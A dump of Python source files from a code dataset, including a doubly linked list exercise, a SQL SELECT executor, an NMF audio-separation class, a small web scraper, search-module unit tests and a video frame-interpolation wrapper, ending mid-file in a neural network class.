+{"seq_id":"45892971","text":"class Node:\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.prev = None\n\t\tself.next = None\n\n\tdef __str__(self):\n\t\treturn \"data->{}\".format(self.data)\n\nclass DoublyLinkedList:\n\tdef __init__(self):\n\t\tself.head = None\n\n\tdef add_last(self, data):\n\t\tn = Node(data)\n\t\tif self.head == None:\n\t\t\tself.head = n\n\t\telse:\n\t\t\tp = self.head\n\t\t\twhile p.next != None:\n\t\t\t\tp = p.next\n\t\t\tn.prev = p\n\t\t\tp.next = n\n\n\tdef add_first(self,data):\n\t\tn = Node(data)\n\t\tif self.head == None:\n\t\t\tself.head = None\n\t\telse:\n\t\t\tn.next = self.head\n\n\tdef list_to_dll(self, l):\n\t\tif self.head != None:\n\t\t\traise Exception(\"you cannot create dll\")\n\t\telse:\n\t\t\tfor i in l:\n\t\t\t\tself.add_last(i)\n\n\n\n\n\n\tdef display(self):\n\t\tif self.head == None:\n\t\t\tprint(\"Empty\")\n\t\telse:\n\t\t\tp = self.head\n\t\t\tc = 1\n\t\t\twhile p:\n\t\t\t\t# print(f\"head value->{self.head.data} and node value is {p.data}\")\n\t\t\t\tprint(f\"{c}th node is {p.data}\")\n\t\t\t\tp = p.next\n\t\t\t\tc+=1\n\n\tdef size_dll(self):\n\t\tif self.head == None:\n\t\t\treturn 0\n\t\telse:\n\t\t\tp = self.head\n\t\t\tcount = 0\n\t\t\twhile p:\n\t\t\t\tp = p.next\n\t\t\t\tcount += 1\n\t\t\treturn count\n\n\n\n\tdef delete_node(self, index):\n\t\t#index starts from 0\n\t\tif self.head == None:\n\t\t\traise Exception(\"List is Empty, you cannot delete Node\")\n\t\telse:\n\t\t\tif self.size_dll() <= index:\n\t\t\t\traise Exception(\"check your index and size of dll\")\n\t\t\telse:\n\t\t\t\tif index == 0:\n\t\t\t\t\ttemp = self.head.data\n\t\t\t\t\tself.head.next.prev = self.head\n\t\t\t\t\tself.head = self.head.next\n\t\t\t\t\treturn temp\n\t\t\t\telif index == (self.size_dll()-1):\n\t\t\t\t\tp = self.head\n\t\t\t\t\tq = None\n\t\t\t\t\twhile p.next != None:\n\t\t\t\t\t\tq = p\n\t\t\t\t\t\tp = p.next\n\t\t\t\t\tq.next = None\n\n\t\t\t\telse:\n\t\t\t\t\tp = self.head\n\t\t\t\t\tq = None\n\t\t\t\t\tfor i in range(index):\n\t\t\t\t\t\tq = p\n\t\t\t\t\t\tp = p.next\n\t\t\t\t\ttemp = p.data\n\t\t\t\t\tp.next.prev = q\n\t\t\t\t\tq.next = p.next\n\t\t\t\t\treturn temp\n\n\tdef delete_last_node(self):\n\t\ttry:\n\t\t\tif self.head == None:\n\t\t\t\traise Exception(\"No element to delete\")\n\t\t\telse: \t\t\n\t\t\t\tp = self.head\n\t\t\t\twhile p.next != None:\n\t\t\t\t\tp = p.next\n\t\t\t\tp.prev.next = None\n\t\texcept Exception as e:\n\t\t\tprint(\"you cannot delete element from an empty dll\")\n\n\tdef delete_first_node(self):\n\t\tif self.head == None:\n\t\t\tprint(\"list is empty\")\n\t\telse:\n\t\t\tself.head = self.head.next\n\n\n\n\n\n\n\n\n\n\ndll = DoublyLinkedList()\n\ndll.list_to_dll([23,53,98,32,748,99,33])\n\ndll.display()\nprint(\"\\n\")\ndll.delete_first_node()\n# print(dll.size_dll())\n# print(\"after\")\ndll.display()\n# print(\"\\n\")\n# dll.delete_node(1)\n# dll.display()\n\n\n\n","sub_path":"doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"8149143","text":"from abstract.instruccion import *\nfrom tools.tabla_tipos import *\nfrom tools.console_text import *\nfrom tools.tabla_simbolos import *\nfrom error.errores import *\nfrom abstract.retorno import *\nfrom prettytable import PrettyTable\nfrom abstract.columnaID import*\nfrom storage import jsonMode as funciones\nfrom instruccion.alias_item import *\nimport operator\n\nclass select_normal(instruccion):\n def __init__(self,distinto, lista_cols, list_tables, donde, groupby, orderby, having, limite, line, column, num_nodo):\n super().__init__(line,column)\n self.distinto=distinto\n self.lista_cols = lista_cols\n self.list_tables = list_tables\n self.donde = donde\n self.groupby = groupby\n self.orderby = orderby\n self.having = having\n self.limite = limite\n\n #AST\n self.nodo = nodo_AST('SELECT',num_nodo)\n self.nodo.hijos.append(nodo_AST('SELECT',num_nodo+1))\n\n if distinto!=None:\n\n self.nodo.hijos.append(nodo_AST('DISTINCT', num_nodo + 2))\n if lista_cols != '*':\n for lista in lista_cols:\n self.nodo.hijos.append(lista.nodo)\n else:\n self.nodo.hijos.append(nodo_AST('*', num_nodo + 3))\n\n self.nodo.hijos.append(nodo_AST('FROM', num_nodo + 4))\n\n self.nodo.hijos.append(nodo_AST(str(list_tables), num_nodo + 5))\n\n if donde != None:\n self.nodo.hijos.append(donde.nodo)\n\n if groupby != None:\n self.nodo.hijos.append(groupby.nodo)\n\n if orderby != None:\n self.nodo.hijos.append(orderby.nodo)\n\n if having != None:\n self.nodo.hijos.append(having.nodo)\n\n if limite != None:\n self.nodo.hijos.append(limite.nodo)\n\n else:\n\n if lista_cols != '*':\n for lista in lista_cols:\n self.nodo.hijos.append(lista.nodo)\n else:\n self.nodo.hijos.append(nodo_AST('*', num_nodo + 2))\n\n self.nodo.hijos.append(nodo_AST('FROM', num_nodo + 3))\n\n self.nodo.hijos.append(nodo_AST(str(list_tables), num_nodo + 4))\n\n if donde != None:\n self.nodo.hijos.append(donde.nodo)\n\n if groupby != None:\n self.nodo.hijos.append(groupby.nodo)\n\n if orderby != None:\n self.nodo.hijos.append(orderby.nodo)\n\n if having != None:\n self.nodo.hijos.append(having.nodo)\n\n if limite != None:\n self.nodo.hijos.append(limite.nodo)\n\n #Gramatica\n self.grammar_ = '| seleccionar ::= SELECT distinto select_list FROM list_id donde group_by order_by group_having limite; | seleccionar = new select_normal(); |
\\n'\n\n if distinto!=None:\n self.grammar_ += '| distinto ::= DISTINCT | distinto = new distinto(); |
\\n'\n if lista_cols != '*':\n self.grammar_ += '| select_list ::= expressiones | select_list = new select_list(); |
\\n'\n self.grammar_ += lista.grammar_\n\n else:\n self.grammar_ += '| select_list ::= * | distinto = new distinto(); |
\\n'\n\n self.grammar_ += '| list_id ::= list_id , alias | list_id = lista.append(id); |
\\n'\n self.grammar_ += '| list_id ::= list_id | list_id = lista[]; |
\\n'\n self.grammar_ += '| alias ::= ID | alias = ID.value; |
\\n'\n\n if donde != None:\n self.grammar_ += donde.grammar_\n\n if groupby != None:\n self.grammar_ += groupby.grammar_\n\n if orderby != None:\n self.grammar_ += orderby.grammar_\n\n if having != None:\n self.grammar_ += having.grammar_\n\n if limite != None:\n self.grammar_ += limite.grammar_\n\n else:\n\n if lista_cols != '*':\n self.grammar_ += '| select_list ::= expressiones | select_list = new select_list(); |
\\n'\n self.grammar_ += lista.grammar_\n\n else:\n self.grammar_ += '| select_list ::= * | distinto = new distinto(); |
\\n'\n\n self.grammar_ += '| list_id ::= list_id , alias | list_id = lista.append(id); |
\\n'\n self.grammar_ += '| list_id ::= list_id | list_id = lista[]; |
\\n'\n self.grammar_ += '| alias ::= ID | alias = ID.value; |
\\n'\n\n if donde != None:\n self.grammar_ += donde.grammar_\n\n if groupby != None:\n self.grammar_ += groupby.grammar_\n\n if orderby != None:\n self.grammar_ += orderby.grammar_\n\n if having != None:\n self.grammar_ += having.grammar_\n\n if limite != None:\n self.grammar_ += limite.grammar_\n\n def ejecutar(self, imprimir=None):\n try:\n for id_item in self.list_tables:\n if isinstance(id_item, alias_item):\n id_item.ejecutar([])\n\n id_db = get_actual_use()\n salidaTabla = PrettyTable()\n encabezados=[]\n\n registro = []\n registro_aux = []\n\n if self.donde == None:\n for tabla in self.list_tables:\n data_table = funciones.extractTable(id_db,tabla)\n registro=data_table\n encabezados=ts.field_names(id_db,tabla)\n #si viene where\n else:\n data_were = self.donde.ejecutar(self.list_tables)\n print(data_were)\n if data_were.tipo != tipo_primitivo.ERROR:\n encabezados = data_were.encabezados\n registro=data_were.valor\n else:\n errores.append(nodo_error(self.line, self.column, 'ERROR - No se pudo ejecutar select', 'Semántico'))\n add_text('ERROR - No se pudo ejecutar select\\n')\n\n #Si viene GroupBy\n\n if self.groupby != None:\n lista_groupBy = self.groupby.ejecutar()\n print(str(lista_groupBy))\n index_G = self.retornador_index(lista_groupBy[0],encabezados)\n print(str(index_G))\n\n registro_columnas = []\n\n for busqueda in registro:\n\n contador_aux = 0\n\n\n for aux in busqueda:\n\n if index_G == contador_aux:\n if self.existencia_grupby(busqueda,registro_columnas,index_G):\n registro_columnas.append(busqueda)\n\n contador_aux += 1\n print(registro_columnas)\n registro=registro_columnas\n\n #Si viene OrderBy\n if self.orderby != None:\n auxOrder_by = self.orderby.ejecutar()\n indexG=self.retornador_index(auxOrder_by.valor[0],encabezados)\n\n if auxOrder_by.tipo == 'ASC':\n registro = sorted(registro, key=lambda i: str(i[indexG]).lower())\n elif auxOrder_by.tipo == 'DESC':\n registro = sorted(registro, key=lambda i: str(i[indexG]).lower(), reverse=True)\n\n if self.lista_cols != '*':\n listCampos2 = []\n auxEncabezados=[]\n for col in self.lista_cols:\n contador = -1\n for campo in encabezados:\n listCampos2.clear()\n contador += 1\n if (col.valor == campo):\n auxEncabezados.append(col.valor)\n aux = columnaId([],col.valor)\n for col2 in registro:\n listCampos2.append(col2[contador])\n aux.lista.append(col2[contador])\n salidaTabla.add_column(campo, listCampos2)\n registro_aux.append(aux)\n registro=self.metodo_sis(registro_aux)\n encabezados=auxEncabezados\n else:\n salidaTabla.field_names = encabezados\n if len(registro) > 0:\n salidaTabla.add_rows(registro)\n\n if self.distinto != None:\n salidaTabla.clear()\n mostrar = []\n aux1 = registro\n for n in registro:\n if self.metodo_Pegre(n, aux1) == 1:\n mostrar.append(n)\n print(n)\n else:\n cont = 0\n for reco in mostrar:\n\n if n == reco:\n cont = 2\n break\n else:\n cont =1\n\n if cont == 1:\n mostrar.append(n)\n registro=mostrar\n salidaTabla.add_rows(mostrar)\n\n\n if imprimir==None :\n add_text('\\n')\n add_text(salidaTabla)\n add_text('\\n')\n\n return retorno(registro[0][0],encabezados,registro)\n except:\n add_text(\"E-22005 error in assignment: the query could not be made.\\n\")\n\n def OrderByBurbuja(self,lista,index):\n print('Index '+str(index))\n \n \n\n return sorted_rank\n \n\n def retornador_index(self, id, lista_campo):\n\n contador = -1\n\n for campo in lista_campo: # RECORRO LOS NOMBRES DE LOS CAMPOS DE LA TS\n contador += 1 # INDICA LA POSICION DE LA COLUMNA DONDE OBTENGO LOS VALORES\n\n if (id == campo):\n 
return contador\n\n return -1\n \n def existencia_grupby(self, valor, lista,index):\n\n for recorido in lista:\n contadorG = 0\n for columnAA in recorido:\n if contadorG == index:\n if str(columnAA) == str(valor[index]):\n return False\n contadorG+=1\n\n return True\n\n def metodo_sis(self,lista):\n lista_original = []\n contador = 0\n\n for recorido in lista[0].lista:\n lista_aux = []\n for columna in lista:\n lista_aux.append(columna.lista[contador])\n contador+=1\n lista_original.append(lista_aux) \n\n return lista_original\n\n def metodo_Pegre(self, dato, lista):\n aux = lista\n contador = 0\n #bandera = True\n\n for recorrido in aux:\n if (recorrido == dato):\n contador += 1\n else:\n pass\n\n return contador\n\n","sub_path":"parser/team23/instruccion/select_normal.py","file_name":"select_normal.py","file_ext":"py","file_size_in_byte":11041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"563325418","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport math\nimport random\n\nimport numpy as np\n\nimport audio_signal\nimport constants\nfrom nussl.separation import separation_base\n\n\nclass NMF(separation_base.SeparationBase):\n \"\"\"\n This is an implementation of the Non-negative Matrix Factorization algorithm for\n source separation. This implementation receives an audio_signal object\n and a number, num_templates, which defines the number of bases vectors.\n\n This class provides two implementations of distance measures, EUCLIDEAN and DIVERGENCE,\n and also allows the user to define distance measure function.\n\n References:\n [1] Lee, Daniel D., and H. Sebastian Seung. \"Algorithms for non-negative matrix factorization.\"\n Advances in neural information processing systems. 2001.\n \"\"\"\n\n def __str__(self):\n return \"Nmf\"\n\n # TODO: Change this so that NMF accepts an AudioSignal object and not a raw stft\n def __init__(self, input_audio_signal, num_templates,\n activation_matrix=None, templates=None, distance_measure=None,\n should_update_template=None, should_update_activation=None):\n self.__dict__.update(locals())\n super(NMF, self).__init__(input_audio_signal=input_audio_signal)\n\n if num_templates <= 0:\n raise Exception('Need more than 0 bases!')\n\n self.stft = self.audio_signal.stft(overwrite=False) # V in literature\n self.num_templates = num_templates\n\n if self.stft.size <= 0:\n raise Exception('STFT size must be > 0!')\n\n if activation_matrix is None and templates is None:\n self.templates = np.zeros((self.stft.shape[0], num_templates)) # W, in literature\n self.activation_matrix = np.zeros((num_templates, self.stft.shape[1])) # H, in literature\n self.randomize_input_matrices()\n elif activation_matrix is not None and templates is not None:\n self.templates = templates\n self.activation_matrix = activation_matrix\n else:\n raise Exception('Must provide both activation matrix and template vectors or nothing at all!')\n\n self.distance_measure = distance_measure if distance_measure is not None else DistanceType.DEFAULT\n self.should_update_template = True if should_update_template is None else should_update_template\n self.should_update_activation = True if should_update_activation is None else should_update_activation\n\n self.should_use_epsilon = False # Replace this with something more general\n self.epsilon_euclidean_type = True\n self.stopping_epsilon = 1e10\n self.max_num_iterations = 20\n\n def run(self):\n \"\"\"\n This runs the NMF separation algorithm. This function assumes that all\n parameters have been set prior to running.\n\n No inputs. do_STFT and N must be set prior to calling this function.\n\n Returns an activation matrix (in a 2d numpy array)\n and a set of template vectors (also 2d numpy array).\n \"\"\"\n\n if self.stft is None or self.stft.size == 0:\n raise Exception('Cannot do NMF with an empty STFT!')\n\n if self.num_templates is None or self.num_templates == 0:\n raise Exception('Cannot do NMF with no bases!')\n\n if self.should_use_epsilon:\n print('Warning: User is expected to have set stopping_epsilon prior to using'\n ' this function. 
Expect this to take a long time if you have not set'\n ' a suitable epsilon.')\n\n should_stop = False\n num_iterations = 0\n while not should_stop:\n\n self.update()\n\n # Stopping conditions\n num_iterations += 1\n if self.should_use_epsilon:\n if self.epsilon_euclidean_type:\n should_stop = self._euclidean_distance() <= self.stopping_epsilon\n else:\n should_stop = self._divergence() <= self.stopping_epsilon\n else:\n should_stop = num_iterations >= self.max_num_iterations\n\n return self.activation_matrix, self.templates\n\n def update(self):\n \"\"\"\n Computes a single update using the update function specified.\n :return: nothing\n \"\"\"\n # update activation matrix\n if self.should_update_activation:\n if self.distance_measure == DistanceType.EUCLIDEAN:\n self.activation_matrix = self._update_activation_euclidean()\n\n elif self.distance_measure == DistanceType.DIVERGENCE:\n self.activation_matrix = self._update_activation_divergent()\n\n # update template vectors\n if self.should_update_template:\n if self.distance_measure == DistanceType.EUCLIDEAN:\n self.templates = self._update_template_euclidean()\n\n elif self.distance_measure == DistanceType.DIVERGENCE:\n self.templates = self._update_template_divergence()\n\n def _update_activation_euclidean(self):\n # make a new matrix to store results\n activation_copy = np.empty_like(self.activation_matrix)\n\n # store in memory so we don't have to do n*m calculations.\n template_T = self.templates.T\n temp_T_stft = np.dot(template_T, self.stft)\n temp_T_act = np.dot(np.dot(template_T, self.templates), self.activation_matrix)\n\n # Eq. 4, H update from [1]\n for indices, val in np.ndenumerate(self.activation_matrix):\n result = temp_T_stft[indices]\n result /= temp_T_act[indices]\n result *= self.activation_matrix[indices]\n activation_copy[indices] = result\n\n return activation_copy\n\n def _update_template_euclidean(self):\n # make a new matrix to store results\n template_copy = np.empty_like(self.templates)\n\n # store in memory so we don't have to do n*m calculations.\n activation_T = self.activation_matrix.T\n stft_act_T = np.dot(self.stft, activation_T)\n temp_act = np.dot(np.dot(self.templates, self.activation_matrix), activation_T)\n\n # Eq. 4, W update from [1]\n for indices, val in np.ndenumerate(self.templates):\n result = stft_act_T[indices]\n result /= temp_act[indices]\n result *= self.templates[indices]\n template_copy[indices] = result\n\n return template_copy\n\n def _update_activation_divergent(self):\n # make a new matrix to store results\n activation_copy = np.empty_like(self.activation_matrix)\n\n dot = np.dot(self.templates, self.activation_matrix)\n\n # Eq. 5, H update from [1]\n for indices, val in np.ndenumerate(self.activation_matrix):\n (a, mu) = indices\n result = sum((self.templates[i][a] * self.stft[i][mu]) / dot[i][mu]\n for i in range(self.templates.shape[0]))\n result /= sum(self.templates[k][a] for k in range(self.templates.shape[0]))\n result *= self.activation_matrix[indices]\n activation_copy[indices] = result\n\n return activation_copy\n\n def _update_template_divergence(self):\n # make a new matrix to store results\n template_copy = np.empty_like(self.templates)\n\n dot = np.dot(self.templates, self.activation_matrix)\n\n # Eq. 
5, W update from [1]\n for indices, val in np.ndenumerate(self.templates):\n (i, a) = indices\n result = sum((self.activation_matrix[a][mu] * self.stft[i][mu]) / dot[i][mu]\n for mu in range(self.activation_matrix.shape[1]))\n result /= sum(self.activation_matrix[a][nu] for nu in range(self.activation_matrix.shape[1]))\n result *= self.templates[indices]\n template_copy[indices] = result\n\n return template_copy\n\n def _euclidean_distance(self):\n try:\n mixture = np.dot(self.templates, self.activation_matrix)\n except ValueError:\n # log the mismatched shapes before re-raising, instead of silently returning None\n print(self.activation_matrix.shape, self.templates.shape)\n raise\n\n if mixture.shape != self.stft.shape:\n raise Exception('Something went wrong! Recombining the activation matrix '\n 'and template vectors is not the same size as the STFT!')\n\n return sum((self.stft[index] - val) ** 2 for index, val in np.ndenumerate(mixture))\n\n def _divergence(self):\n # W . H, in the same order as in _euclidean_distance (the reversed order is not conformable)\n mixture = np.dot(self.templates, self.activation_matrix)\n\n if mixture.shape != self.stft.shape:\n raise Exception('Something went wrong! Recombining the activation matrix '\n 'and template vectors is not the same size as the STFT!')\n\n # Divergence D(V||WH) as defined in [1]: sum(V log(V / WH) - V + WH), with natural log\n return sum(\n (self.stft[index] * math.log(self.stft[index] / val) - self.stft[index] + val)\n for index, val in np.ndenumerate(mixture))\n\n def make_audio_signals(self):\n # TODO: this!\n raise NotImplementedError('This does not work yet.')\n signals = []\n for stft in self.recombine_calculated_matrices():\n signal = audio_signal.AudioSignal(stft=stft)\n signal.istft()\n signals.append(signal)\n return signals\n\n def recombine_calculated_matrices(self):\n new_matrices = []\n for n in range(self.num_templates):\n matrix = np.zeros_like(self.activation_matrix) # zeros, so every row except the n-th stays silent\n matrix[n, ] = self.activation_matrix[n, ]\n\n new_stft = np.dot(self.templates, matrix)\n new_matrices.append(new_stft)\n return new_matrices\n\n def randomize_input_matrices(self, shouldNormalize=False):\n self._randomize_matrix(self.activation_matrix, shouldNormalize)\n self._randomize_matrix(self.templates, shouldNormalize)\n\n @staticmethod\n def _randomize_matrix(M, shouldNormalize=False):\n for i, row in enumerate(M):\n for j, col in enumerate(row):\n M[i][j] = random.random()\n\n if not shouldNormalize:\n M[i][j] *= constants.DEFAULT_MAX_VAL\n return M\n\n def plot(self, outputFile, **kwargs):\n raise NotImplementedError('Sorry, you cannot do this yet.')\n\n\nclass DistanceType:\n EUCLIDEAN = 'euclidean'\n DIVERGENCE = 'divergence'\n DEFAULT = EUCLIDEAN\n\n def __init__(self):\n pass\n","sub_path":"nussl/Nmf.py","file_name":"Nmf.py","file_ext":"py","file_size_in_byte":10328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"44589263","text":"# -*- coding:utf-8 -*-\n# @Time :2019/7/11 22:22\n# @Author: Athany\n# @File : 7.11-Spider- etree练习糗事百科.py\n\n\"\"\"\nCrawl Qiushibaike\nAnalysis:\n1. Use requests to fetch the page, and xpath/re to extract the data\n2. Extractable info: user avatar link, joke content, number of likes\n3. Save the results to a json file\n\nRoughly three parts:\n1. Download the page\n2. Extract the info with xpath\n3. Save the results to a file\n\"\"\"\n\nimport requests\nfrom lxml import etree\n\n\nurl = \"https://www.qiushibaike.com/\"\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\"\n}\n\nrsp = requests.get(url, headers=headers)\nhtml = rsp.text\n\n# Parse the page text into an html element tree\nhtml = etree.HTML(html)\nrst = html.xpath('//div[contains(@id, \"qiushi_tag\")]')\nprint(rst)\n\nfor r in rst:\n print(r)\n # relative xpath ('.//') so only this post's content is matched, not the whole page\n content = r.xpath('.//div[@class=\"content\"]/span')[0].text.strip()\n print(content)\n","sub_path":"习题课/7.11-Spider- etree练习糗事百科.py","file_name":"7.11-Spider- etree练习糗事百科.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"581529328","text":"\"\"\"Unit tests for ducksearch module.\"\"\"\nfrom unittest import TestCase, mock, main\nimport json\nimport ducksearch\nimport wordlist\nfrom request_mock import mocked_requests_get\n\n\nclass TestDucksearch(TestCase):\n \"\"\"Ducksearch unit test suite.\"\"\"\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_word_list_search_result_size(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check the number of results returned is the same as the wordlist size.\"\"\"\n json_result = ducksearch.search_word_list()\n result = json.loads(json_result)\n self.assertEqual(len(result), wordlist.NUMBER_OF_WORDS)\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[\"a\", \"b\", \"c\"])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_no_request_sent_if_cached_value(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check no request is sent to duckduckgo if there is a cached value.\"\"\"\n ducksearch.get_top_three_titles_json(\"something\")\n mock_get.assert_not_called()\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_parse_result(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check parsed titles match expected value.\"\"\"\n expected_value = [\n \"This is a test ad\",\n \"Test - Wikipedia\",\n \"Test | Definition of Test by Merriam-Webster\"\n ]\n result = ducksearch.get_top_three_titles(\"something\")\n self.assertListEqual(result, expected_value)\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_cache_push(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check an attempt is made to cache the value if no cached value is provided.\"\"\"\n titles = [\n \"This is a test ad\",\n \"Test - Wikipedia\",\n \"Test | Definition of Test by Merriam-Webster\"\n ]\n search_term = \"something\"\n ducksearch.get_top_three_titles(search_term)\n mock_redis_lpush.assert_called_with(search_term, *titles)\n\n @mock.patch('ducksearch.requests.get', side_effect=mocked_requests_get)\n @mock.patch('ducksearch.redis_client.lrange', return_value=[])\n @mock.patch('ducksearch.redis_client.lpush')\n def test_valid_json(self, mock_redis_lpush, mock_redis_lrange, mock_get):\n \"\"\"Check the result provided is valid json.\"\"\"\n json_result = ducksearch.get_top_three_titles_json(\"something\")\n try:\n json.loads(json_result)\n\n except ValueError:\n self.fail(\"get_top_three_titles_json returned invalid json\")\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test_ducksearch.py","file_name":"test_ducksearch.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"596291871","text":"import os\n\nimport numpy\nimport torch\n\nfrom vrt import dictionaries, utils\nfrom . import networks\n\n\nclass RTer:\n def __init__(\n self,\n height, width,\n model_path=None, default_model_dir=None,\n sf=2, resize_hotfix=False,\n net_name='DAIN_slowmotion', rectify=False, useAnimationMethod=False,\n *args, **kwargs\n ):\n torch.backends.cudnn.enabled = True\n torch.backends.cudnn.benchmark = True\n torch.set_grad_enabled(False)\n # Save parameters\n self.sf = sf\n self.resize_hotfix = resize_hotfix\n self.network = net_name\n # Initialize pader\n self.pader = utils.modeling.Pader(\n width, height, 128, extend_func='replication'\n )\n self.dim = self.pader.paded_size\n # Resolve the model path\n if model_path is None:\n model_path = os.path.abspath(os.path.join(\n default_model_dir, dictionaries.model_paths['dain']\n ))\n utils.folder.check_model(model_path)\n # Initialize model\n self.model = networks.__dict__[self.network](\n padding=self.pader.slice,\n channel=3, filter_size=4,\n timestep=1/self.sf, rectify=rectify, useAnimationMethod=useAnimationMethod,\n training=False\n ).cuda()\n # Load state dict\n model_dict = self.model.state_dict()\n pretrained_dict = {k: v for k, v in torch.load(model_path).items() if k in model_dict}\n model_dict.update(pretrained_dict)\n self.model.load_state_dict(model_dict)\n self.model.eval()\n # Initialize batch\n self.need_to_init = True\n\n def get_output_effect(self):\n return {\n 'height': 1,\n 'width': 1,\n 'fps': self.sf\n }\n\n def ndarray2tensor(self, frame: list):\n frame = torch.from_numpy(frame[0].copy()).cuda()\n frame = frame.permute(2, 0, 1)\n frame = frame.unsqueeze(0)\n frame = frame.float()\n frame /= 255.0\n frame = self.pader.pad(frame)\n return frame\n\n def tensor2ndarray(self, tensor):\n tensor = torch.stack(tensor)\n if self.resize_hotfix:\n tensor = utils.modeling.resize_hotfix(tensor)\n tensor = tensor.clamp(0.0, 1.0)\n tensor *= 255.0\n tensor = tensor.byte()\n tensor = tensor.permute(0, 2, 3, 1)\n tensor = tensor.cpu().numpy()\n return tensor\n\n def rt(self, frame, *args, **kwargs):\n if self.need_to_init:\n self.need_to_init = False\n self.tensor_1 = self.ndarray2tensor(frame)\n self.ndarray_1 = frame\n return []\n self.tensor_0, self.tensor_1 = self.tensor_1, self.ndarray2tensor(frame)\n self.ndarray_0, self.ndarray_1 = self.ndarray_1, frame\n I0 = self.tensor_0\n I1 = self.tensor_1\n intermediate_frames = self.model(I0, I1)\n intermediate_frames = self.tensor2ndarray(intermediate_frames)\n return_ = [self.ndarray_0[0], *intermediate_frames]\n if kwargs.get('duplicate'): # .get() so a missing 'duplicate' flag does not raise\n return_.extend([frame[0], frame[0]])\n return return_\n","sub_path":"vrt/vfin/dain/rter.py","file_name":"rter.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"570858241","text":"import cv2 as cv\nimport argparse\nfrom pathlib import Path\nimport utils\n\n\ndef main():\n # construct the argument parse and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--image\", required=True, help=\"path to the input image\")\n ap.add_argument(\"-p\", \"--prefix\", required=False, help=\"prefix for clipped image\", default=\"converted\")\n args = vars(ap.parse_args())\n\n image = cv.imread(args[\"image\"])\n clipped_image = utils.detect(image)\n\n # parse file location\n image_path = Path(args[\"image\"]).resolve()\n image_dir = image_path.parent\n image_name = image_path.stem # stem (name without suffix), so the extension is not duplicated below\n image_extension = image_path.suffix\n\n # save image\n cv.imwrite('{}/{}_{}{}'.format(image_dir, args[\"prefix\"], image_name, image_extension), clipped_image)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"core/Cliper.py","file_name":"Cliper.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"582509425","text":"import kero.utils.utils as ut\nimport numpy as np\n\n# print(\"@NeuralNetwork.py\")\n# print(\"@utils.utils test:\")\n# ut.test()\n# print(\"@@\")\n\nclass NeuralNetwork:\n\tdef __init__(self):\n\t\tprint(\"Initializing a Neural Network object.\")\n\t\tself.is_consistent = None\n\n\t\tself.weights = None\n\t\tself.biases = None\t\n\t\t\n\t\t#----------------------------------------\n\t\t# weights : the collection of weights in the neural network\n\t\t# weights is a list [w_l], where w_l is the collection of weights between \n\t\t# the (l-1)-th and l-th LAYER\n\t\t# for l=2,3,...,L where l=1 is the input layer, l=2 the first hidden layer\n\t\t# and l=L is the output layer\n\t\t# w_l is a matrix (list of list)\n\t\t# so that w_l[i][j] is the weight between neuron j at layer l-1 and \n\t\t# neuron i at layer l \n\t\t# biases : the collection of biases in the neural network\n\t\t# biases is a list [b_l], where b_l is the collection of biases in the l-th layer\n\t\t# for l=2,3,...,L\n\n\t\tself.number_of_neurons = None\n\t\tself.number_of_input = None # number_of_neurons[0]\n\t\tself.number_of_output = None # number_of_neurons[-1]\n\t\t#----------------------------------------\n\t\t# This is set when initiate_neural_network_general() is called\n\t\t#\n\t\t# number_of_neurons : given L layers, then this is the list \n\t\t# [N1,N2,...,NL] where Nj is the number of neurons in the j-th layer\n\t\t# number_of_input = N1\n\t\t# number_of_output = NL\n\n\t\tself.learning_rate=1e-5\n\t\t#----------------------------------------\n\t\t#\n\t\t#\n\n\t\treturn\n\n\t# NN.L1\n\tdef initiate_neural_network(self,bulk, mode=None,\n\t\tverbose = False,\n\t\tverbose_init_mode=False,\n\t\tverbose_consistency=False):\n\t\tif verbose>0 : print(\" + Initiate_neural_network(). 
